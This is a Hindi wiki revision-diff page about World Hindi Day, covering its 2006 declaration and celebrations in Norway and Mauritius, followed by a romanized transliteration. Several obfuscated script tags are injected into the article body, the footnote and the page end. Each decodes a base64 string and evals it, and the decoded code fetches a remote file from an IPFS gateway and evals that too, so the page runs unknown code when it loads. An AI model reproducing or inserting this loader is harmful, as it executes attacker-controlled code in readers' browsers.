Difference between revisions of "विश्व हिन्दी दिवस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:WorldHindiDay.gif|thumb|250px|right|विश्व हिन्दी दिवस पर प्रधानमन्त्री [[मनमोहन सिंह]] का पत्र]]
 
[[चित्र:WorldHindiDay.gif|thumb|250px|right|विश्व हिन्दी दिवस पर प्रधानमन्त्री [[मनमोहन सिंह]] का पत्र]]
'''विश्व हिन्दी दिवस ( World Hindi Day )''' प्रत्येक वर्ष '''[[10 जनवरी]]''' को पूरे विश्व में मनाया जाता है। प्रधानमन्त्री [[मनमोहन सिंह]] ने 10 जनवरी [[2006]] को प्रति वर्ष विश्व हिन्दी दिवस के रूप मनाये जाने की घोषणा की थी। उसके बाद से भारतीय विदेश मंत्रालय ने विदेश में '''10 जनवरी 2006 को पहली बार विश्व हिंदी दिवस मनाया था''' । इसका उद्देश्य विश्व में [[हिन्दी]] के प्रचार - प्रसार के लिये जागरूकता पैदा करना तथा हिन्दी को अन्तराष्ट्रीय भाषा के रूप में पेश करना है। विदेशों में [[भारत]] के दूतावास इस दिन को विशेष रूप से मनाते हैं। सभी सरकारी कार्यालयों में विभिन्न विषयों पर हिन्दी में व्याख्यान आयोजित किये जाते हैं।
+
'''विश्व हिन्दी दिवस''' प्रत्येक वर्ष '''[[10 जनवरी]]''' को पूरे विश्व में मनाया जाता है। प्रधानमन्त्री [[मनमोहन सिंह]] ने 10 जनवरी [[2006]] को प्रति वर्ष विश्व हिन्दी दिवस के रूप मनाये जाने की घोषणा की थी। उसके बाद से भारतीय विदेश मंत्रालय ने विदेश में '''10 जनवरी 2006 को पहली बार विश्व हिंदी दिवस मनाया था'''। इसका उद्देश्य विश्व में [[हिन्दी]] के प्रचार - प्रसार के लिये जागरूकता पैदा करना तथा हिन्दी को अन्तराष्ट्रीय भाषा के रूप में पेश करना है। विदेशों में [[भारत]] के दूतावास इस दिन को विशेष रूप से मनाते हैं। सभी सरकारी कार्यालयों में विभिन्न विषयों पर हिन्दी में व्याख्यान आयोजित किये जाते हैं।
 
 
 
'''नार्वे''' में पहला विश्व हिन्दी दिवस भारतीय दूतावास ने तथा दूसरा और तीसरा विश्व हिन्दी दिवस भारतीय नार्वेजीय सूचना एवं सांस्कृतिक फोरम के तत्वाधान में लेखक सुरेशचन्द्र शुक्ल की अध्यक्षता में बहुत धूमधाम से मनाया गया था।
 
'''नार्वे''' में पहला विश्व हिन्दी दिवस भारतीय दूतावास ने तथा दूसरा और तीसरा विश्व हिन्दी दिवस भारतीय नार्वेजीय सूचना एवं सांस्कृतिक फोरम के तत्वाधान में लेखक सुरेशचन्द्र शुक्ल की अध्यक्षता में बहुत धूमधाम से मनाया गया था।
 
+
[[इन्दिरा गाँधी]] भारतीय सांस्कृतिक केन्द्र के सभागार में, [[रविवार]] [[10 जनवरी]] [[2010]] को, विश्व हिन्दी सचिवालय, शिक्षा, संस्कृति एवं मानव संसाधन मन्त्रालय, भारतीय उच्चायोग, इन्दिरा गाँधी भारतीय सांस्कृतिक केन्द्र तथा हिन्दी संगठन के मिले-जुले सहयोग से विश्व हिन्दी दिवस 2010 मनाया गया जिसमें मुख्य अतिथि हंगरी के भारोपीय शिक्षा विभाग से आई हुई डॉ. मारिया नेज्यैशी थी, इस उपल्क्ष्य पर विश्व हिन्दी सचिवालय की एक रचना ( एक विश्व हिन्दी पत्रिका ) का भी लोकार्पण गणराज्य के राष्ट्रपति माननीय सर अनिरुद्ध जगन्नाथ जी के कर-कमलों द्वारा हुआ। इस अवसर पर भारतीय उच्चायोग द्वारा आयोजित राष्ट्रीय स्तर पर कविता-प्रतियोगिता के विजेताओं को भी सम्मानित किया गया, सम्मान उन सभी नवोदित कवियों का वास्तव में रहा जिनको अपनी कलात्मकता प्रेषित करने का एक मंच प्राप्त हुआ।<ref>{{cite web |url=http://hindi-khabar.hindyugm.com/2010/01/world-hindi-day-function-mauritius.html |title=मॉरीशस में विश्व हिन्दी दिवस 2010 समारोह |accessmonthday=26 दिसंबर |accessyear=2010 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=हिन्द युग्म |language= }}</ref>
[[इन्दिरा गाँधी]] भारतीय सांस्कृतिक केन्द्र के सभागार में, [[रविवार]] [[10 जनवरी]] [[2010]] को, विश्व हिन्दी सचिवालय, शिक्षा, संस्कृति एवं मानव संसाधन मन्त्रालय, भारतीय उच्चायोग, इन्दिरा गाँधी भारतीय सांस्कृतिक केन्द्र तथा हिन्दी संगठन के मिले-जुले सहयोग से विश्व हिन्दी दिवस 2010 मनाया गया जिसमें मुख्य अतिथि हंगरी के भारोपीय शिक्षा विभाग से आई हुई डॉ. मारिया नेज्यैशी थी, इस उपल्क्ष्य पर विश्व हिन्दी सचिवालय की एक रचना ( एक विश्व हिन्दी पत्रिका ) का भी लोकार्पण गणराज्य के राष्ट्रपति माननीय सर अनिरुद्ध जगन्नाथ जी के कर-कमलों द्वारा हुआ। इस अवसर पर भारतीय उच्चायोग द्वारा आयोजित राष्ट्रीय स्तर पर कविता-प्रतियोगिता के विजेताओं को भी सम्मानित किया गया, सम्मान उन सभी नवोदित कवियों का वास्तव में रहा जिनको अपनी कलात्मकता प्रेषित करने का एक मंच प्राप्त हुआ।
 
  
 
{{लेख प्रगति
 
{{लेख प्रगति
|आधार=आधार1
+
|आधार=
|प्रारम्भिक=
+
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=

Revision as of 12:07, 26 December 2010

[[chitr:WorldHindiDay.gif|thumb|250px|right|vishv hindi divas par pradhanamantri manamohan sianh ka patr]] vishv hindi divas pratyek varsh 10 janavari ko poore vishv mean manaya jata hai. pradhanamantri manamohan sianh ne 10 janavari 2006 ko prati varsh vishv hindi divas ke roop manaye jane ki ghoshana ki thi. usake bad se bharatiy videsh mantralay ne videsh mean 10 janavari 2006 ko pahali bar vishv hiandi divas manaya tha. isaka uddeshy vishv mean hindi ke prachar - prasar ke liye jagarookata paida karana tatha hindi ko antarashtriy bhasha ke roop mean pesh karana hai. videshoan mean bharat ke dootavas is din ko vishesh roop se manate haian. sabhi sarakari karyalayoan mean vibhinn vishayoan par hindi mean vyakhyan ayojit kiye jate haian. narve mean pahala vishv hindi divas bharatiy dootavas ne tatha doosara aur tisara vishv hindi divas bharatiy narvejiy soochana evan saanskritik phoram ke tatvadhan mean lekhak sureshachandr shukl ki adhyakshata mean bahut dhoomadham se manaya gaya tha. indira gaandhi bharatiy saanskritik kendr ke sabhagar mean, ravivar 10 janavari 2010 ko, vishv hindi sachivalay, shiksha, sanskriti evan manav sansadhan mantralay, bharatiy uchchayog, indira gaandhi bharatiy saanskritik kendr tatha hindi sangathan ke mile-jule sahayog se vishv hindi divas 2010 manaya gaya jisamean mukhy atithi hangari ke bharopiy shiksha vibhag se aee huee d aau. mariya nejyaishi thi, is upalkshy par vishv hindi sachivalay ki ek rachana ( ek vishv hindi patrika ) ka bhi lokarpan ganarajy ke rashtrapati mananiy sar aniruddh jagannath ji ke kar-kamaloan dvara hua. is avasar par bharatiy uchchayog dvara ayojit rashtriy star par kavita-pratiyogita ke vijetaoan ko bhi sammanit kiya gaya, samman un sabhi navodit kaviyoan ka vastav mean raha jinako apani kalatmakata preshit karane ka ek manch prapt hua.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. m aaurishas mean vishv hindi divas 2010 samaroh (ech.ti.em.el) hind yugm. abhigaman tithi: 26 disanbar, 2010.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>